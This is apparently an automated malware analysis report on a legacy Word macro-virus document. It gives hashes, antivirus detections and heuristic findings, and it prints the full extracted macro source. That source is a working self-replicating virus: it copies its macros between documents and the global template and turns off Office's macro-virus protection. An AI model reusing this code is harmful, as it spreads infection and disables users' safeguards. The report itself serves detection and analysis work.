Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7ff31ab65de693e…

MALICIOUS

Office (OLE)

Size: 34.5 KB
Created: 2000-06-23 06:35:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 68fedb9c5fcc8382b32fb1bfe642bc60
SHA-1: 004f939e38f4b07d511886cfd718005cc11801c3
SHA-256: f7ff31ab65de693ee1611517ad9eb3c103e57a4a032188d1785d1a9f2047a94a
Risk score: 256

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro-virus and contains VBA macros, including AutoOpen and Auto_Close, which are often used to execute malicious code upon document opening or closing. The script attempts to copy macros named 'MAGIA', 'ToolsMacro', and 'ViewVBCode' to the current document and potentially globally, indicating an effort to embed or spread malicious functionality. The presence of 'Doc.Trojan.Nottice-3' and 'Win.Trojan.C-286' detections further supports a malicious classification.

Heuristics (6)

  • ClamAV: Doc.Trojan.Nottice-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nottice-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3292 bytes
SHA-256: d15848c6dcb9d178e06757f1426747db4d87ca1d7aebccd510c557f2841422e1
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "F%"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim J$
On Error GoTo -1: On Error GoTo Huayco
WordBasic.DisableAutoMacros 0
J$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If J$ = "normal.dot" Then
    If Mur = 1 Then
        GoTo Huayco
    Else
        WichaDOC
    End If
Else
    If Siwa = 1 Then
        GoTo Huayco
    Else
        WichaGlobal
    End If
End If
Huayco:
WordBasic.Call "MAGIA"
End Sub

Private Function Mur()
Dim i
Mur = 0
If WordBasic.CountMacros(1) > 0 Then
    For i = 1 To WordBasic.CountMacros(1)
                If WordBasic.[MacroName$](i, 1) = "MAGIA" Then
                             Mur = 1
        End If
    Next i
End If
End Function

Private Function Siwa()
Dim i
Siwa = 0
If WordBasic.CountMacros(0) > 0 Then
    For i = 1 To WordBasic.CountMacros(0)
                If WordBasic.[MacroName$](i, 0) = "MAGIA" Then
                             Siwa = 1
        End If
    Next i
End If
End Function

Private Sub WichaDOC()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:MAGIA", WordBasic.[FileName$]() + ":MAGIA"
WordBasic.MacroCopy "Global:ToolsMacro", WordBasic.[FileName$]() + ":ToolsMacro"
WordBasic.MacroCopy "Global:ViewVBCode", WordBasic.[FileName$]() + ":ViewVBCode"
WordBasic.FileSaveAll 1, 1
End Sub

Private Sub WichaGlobal()
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":MAGIA", "Global:MAGIA"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":ToolsMacro", "Global:ToolsMacro"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":ViewVBCode", "Global:ViewVBCode"
WordBasic.FileSaveAll 1, 0
End Sub


Attribute VB_Name = "MAGIA"
'any change will kill your system
'wicha wicha wicha
Public Sub MAIN()
Attribute MAIN.VB_Description = "F%"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.MAGIA.MAIN"
If WordBasic.Day(WordBasic.Now()) = 19 Then
    WordBasic.FileNew
    WordBasic.ToggleFull
    WordBasic.DocMaximize
    WordBasic.Font "Imprint MT Shadow"
    WordBasic.FontSize 30
    WordBasic.Bold
    WordBasic.FormatFont Color:=10
    WordBasic.Insert "¡MaG0 ViRu5!              "
    WordBasic.FormatFont Color:=1
    WordBasic.FontSize 18
    WordBasic.Insert "         <Chac1acay0 -- PeRU>"
End If
With Options
.VirusProtection = False
End With
End Sub

Attribute VB_Name = "ToolsMacro"
Public Sub MAIN()
Attribute MAIN.VB_Description = "F%"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HerramMacr.MAIN"
'wicha wicha wicha
End Sub

Attribute VB_Name = "ViewVBCode"
Public Sub MAIN()
Attribute MAIN.VB_Description = "F%"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.VerCódigovb.MAIN"
'wicha wicha wicha
End Sub